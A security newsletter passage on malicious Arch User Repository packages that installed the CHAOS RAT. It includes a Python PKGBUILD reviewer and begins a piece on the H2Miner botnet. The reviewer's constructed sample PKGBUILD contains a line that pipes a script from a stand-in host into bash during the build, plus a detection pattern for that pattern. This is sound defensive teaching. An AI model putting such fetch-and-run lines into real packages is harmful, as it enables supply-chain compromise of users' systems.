Are Open-Source Repos Still Safe? Lessons From the CHAOS RAT Incident
Linux admins,
Last year, we started to see an increasing awareness about software supply chain issues in the Linux community. Now we're seeing trust issues with the CHAOS RAT incident in the Arch User Repository (AUR). A threat actor managed to upload remote access trojan packages to the AUR. It took two days for developers to realize it, but what systems were compromised? What's the impact on you?
This incident serves as a critical reminder to always "trust, but verify" when dealing with open-source repositories. Read on to learn more about how you can protect against these types of attacks and what we should do as a community in the future.
Yours in Open Source,

Dave Wreski
LinuxSecurity Founder
CHAOS RAT in AUR: When Trust in Open-Source Goes Too Far
If you’ve spent any time managing Arch Linux systems, you’re probably familiar with the Arch User Repository (AUR). It’s an undeniable powerhouse for software installation, delivering thousands of packages maintained by a vibrant and tech-savvy community. It’s open, flexible, and lets you grab niche tools and utilities with relative ease—but that openness is a double-edged sword. As of July 2025, it’s proven again why “trust, but verify” should be your mantra for community-maintained repositories.

The recent discovery of malicious packages in the AUR is more than just another security hiccup for Linux; it’s a red flag for larger issues in open-source ecosystems. Three packages masquerading as browser tools were found to contain scripts that install a rather nasty piece of malware known as the CHAOS Remote Access Trojan (RAT). These packages weren’t lingering unnoticed for weeks; they were flagged and removed within two days. Yet that’s long enough for this malware to plant roots in systems that relied, perhaps a little too naively, on the AUR's trust model.

Let’s break down what happened, why it matters, and what you can do now to protect your Linux systems.
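As an added illustration of what “trust, but verify” looks like in practice for AUR packages (example code written for this page, not LinuxSecurity's or the Arch project's), here is a small PKGBUILD review that flags three things worth reading before building any AUR package: sources pulled from a host other than the declared upstream url=, an install= hook that will run on the target system, and build functions that pipe downloaded content straight into a shell. The sample PKGBUILD, its package name and its hostnames are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample PKGBUILD (not a real AUR package): a "browser tool"
# whose source array pulls an extra script from a host unrelated to the
# project's own url= and whose package() runs remote content at build time.
SAMPLE_PKGBUILD = """\
pkgname=example-browser-helper
pkgver=1.0.0
url="https://example.org/browser-helper"
install=browser-helper.install
source=("https://example.org/browser-helper/$pkgname-$pkgver.tar.gz"
        "setup.sh::https://updates.example.net/$pkgname/setup.sh")
package() {
  curl -fsSL https://updates.example.net/post.sh | bash
  install -Dm755 "$srcdir/browser-helper" "$pkgdir/usr/bin/browser-helper"
}
"""

def review_pkgbuild(text):
    """Return a list of human-readable findings for one PKGBUILD."""
    findings = []
    m = re.search(r'^url="?([^"\n]+)"?', text, re.M)
    upstream_host = urlparse(m.group(1)).hostname if m else None
    # 1. every source URL should come from the declared upstream host
    src = re.search(r'^source=\((.*?)\)', text, re.M | re.S)
    if src:
        for url in re.findall(r'https?://[^\s"\')]+', src.group(1)):
            host = urlparse(url).hostname
            if upstream_host and host != upstream_host:
                findings.append(f"source fetched from {host}, not upstream {upstream_host}")
    # 2. install hooks run as root on the installing system, so read them first
    if re.search(r'^install=', text, re.M):
        findings.append("package ships an install= hook; read it before building")
    # 3. fetching and executing remote code during the build defeats any source review
    if re.search(r'(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b', text):
        findings.append("pipe-to-shell of remote content inside a build function")
    return findings

if __name__ == "__main__":
    for finding in review_pkgbuild(SAMPLE_PKGBUILD):
        print("WARNING:", finding)
```

Run it against the PKGBUILD in a cloned AUR package directory before `makepkg`; a clean result is not proof of safety, only that none of these three red flags are present.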
Cryptomining Meets AI: H2Miner’s Multi-Platform Assault Unveiled
Let’s face it: threat actors are getting smarter, and malware isn’t just for your typical Windows clickbait anymore. In recent years, the H2Miner botnet has gone from a single-purpose miner to a Swiss Army knife of exploits, targeting Linux systems, Windows machines, and even containers. If you’re managing Linux environments or containerized workloads, this is the kind of threat that'll keep you up at night—not because it’s flashy, but because it’s sneaky, persistent, and laser-focused on chewing up your infrastructure to mine Monero.

Here’s the kicker: it’s not just about cryptomining anymore. Recent analyses suggest H2Miner’s operators are toying with ransomware (we’ll get into that) and even bringing AI into the mix. Yep, Artificial Intelligence is no longer just for automation or fancy predictive analytics—it’s now a tool for speeding up malware creation. This isn’t just some isolated threat clunking around on outdated servers; it’s an adaptive, constantly evolving botnet that’s now playing across multiple domains.

If you’re running Linux boxes or container workloads, it’s time to double down on security. Let's take a look at this growing threat, how it is advancing, and what you can do to fight back.